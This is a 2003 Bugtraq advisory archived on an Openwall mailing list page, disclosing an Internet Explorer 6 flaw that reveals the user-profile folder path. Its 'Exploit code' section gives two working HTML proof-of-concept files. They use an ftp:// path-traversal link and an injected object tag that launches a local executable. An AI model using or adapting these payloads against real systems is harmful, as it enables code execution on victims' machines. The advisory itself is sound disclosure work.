lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000701c32b5b$fb2cee70$6401a8c0@EnSof>
Date: Thu, 5 Jun 2003 21:14:11 +0900
From: "Eiji James Yoshida" <ptrs-ejy@...iij4u.or.jp>
To: <bugtraq@...urityfocus.com>
Subject: Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html]


Date:
~~~~~~~~~~~~~~~~~
5 June 2003


Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy@...iij4u.or.jp]


Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP3 Internet Explorer 6.0 SP1


Overview:
~~~~~~~~~~~~~~~~~
A remote attacker is able to gain access to the path of the %USERPROFILE% folder
without guessing a target user name by this vulnerability.

ex.) %USERPROFILE% = "C:\Documents and Settings\victim"


Details:
~~~~~~~~~~~~~~~~~
This vulnerability is in the address of a "Cannot find server" page.
The address of a "Cannot find server" page is
"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and
Settings\%USERNAME%\Desktop\ftp:\\%@\".


Exploit code:
~~~~~~~~~~~~~~~~~
**************************************************
This exploit reads %TEMP%\exploit.html.
You need to create it.
And click on the "Exploit" link on the ftpexp.html.
**************************************************

[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>

[ftpexp.html]
<html>
<a href="ftp://%@.../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>


Workaround:
~~~~~~~~~~~~~~~~~
None.


Vendor Status:
~~~~~~~~~~~~~~~~~
Microsoft was notified on 7 November 2002.
A patch will be released to fix this bug in the future.


- ------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: ptrs-ejy@...iij4u.or.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- ------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPt8y+vfWv13kjJq0EQJ+tgCeKwVv/+MtKD2zGtp29pjwlDR119MAoJOk
ABdf8AVY3NtdcBgzsS7VHm+J
=52pX
-----END PGP SIGNATURE-----



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ